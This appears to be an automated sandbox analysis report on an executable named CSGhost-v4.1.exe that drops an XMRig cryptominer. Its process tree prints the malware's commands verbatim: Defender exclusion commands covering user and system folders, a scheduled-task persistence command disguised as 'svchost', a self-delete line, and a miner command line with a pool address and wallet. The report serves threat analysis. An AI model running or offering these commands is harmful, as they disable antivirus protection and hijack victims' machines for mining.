NL 45.14.49.109:54819 tcp

Files

memory/4648-1-0x0000000002EF0000-0x0000000002FF0000-memory.dmp

memory/4648-2-0x0000000002E30000-0x0000000002E5F000-memory.dmp

memory/4648-3-0x0000000000400000-0x0000000000432000-memory.dmp

memory/4648-4-0x0000000004B80000-0x0000000004BA2000-memory.dmp

memory/4648-5-0x00000000073B0000-0x0000000007954000-memory.dmp

memory/4648-6-0x0000000007360000-0x0000000007380000-memory.dmp

memory/4648-7-0x0000000000400000-0x0000000002C86000-memory.dmp

memory/4648-8-0x0000000007960000-0x0000000007F78000-memory.dmp

memory/4648-10-0x0000000008020000-0x000000000805C000-memory.dmp

memory/4648-9-0x0000000008000000-0x0000000008012000-memory.dmp

memory/4648-11-0x0000000008080000-0x00000000080CC000-memory.dmp

memory/4648-12-0x0000000008210000-0x000000000831A000-memory.dmp

memory/4648-13-0x0000000002EF0000-0x0000000002FF0000-memory.dmp

memory/4648-15-0x0000000002E30000-0x0000000002E5F000-memory.dmp

memory/4648-16-0x0000000000400000-0x0000000000432000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4932 set thread context of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4444 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 4444 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 4444 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 4444 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 4444 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 4992 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 4992 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3760 wrote to memory of 1964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 1964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 4636 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 4636 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 2980 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 2980 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 3352 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 3352 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 4992 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 2560 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2560 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 1844 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 1844 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 4628 wrote to memory of 808 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4628 wrote to memory of 808 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1844 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1844 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1844 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 1844 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 3780 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3780 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 4428 wrote to memory of 2608 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 2608 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3232 wrote to memory of 4400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 3232 wrote to memory of 4400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 4428 wrote to memory of 4964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 4964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 3700 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 3700 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1484 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1484 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3780 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 3780 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 3352 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 3352 wrote to memory of 4932 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 4932 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 4932 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 4932 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 4932 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1736 wrote to memory of 1580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 1580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe
PID 4932 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe

"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Windows\System32\svchost.exe

C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14444 --user=448F1xWYd98Rsot8PEiA5FNbcX7h9ZNRcT6Kt41uAoUF4BrDE3Ph3YQ3ojownLCTrC4J1Bomr6LzrCTopwmq1fq33FrUvqJ --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-stealth

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-us-east1.nanopool.org udp
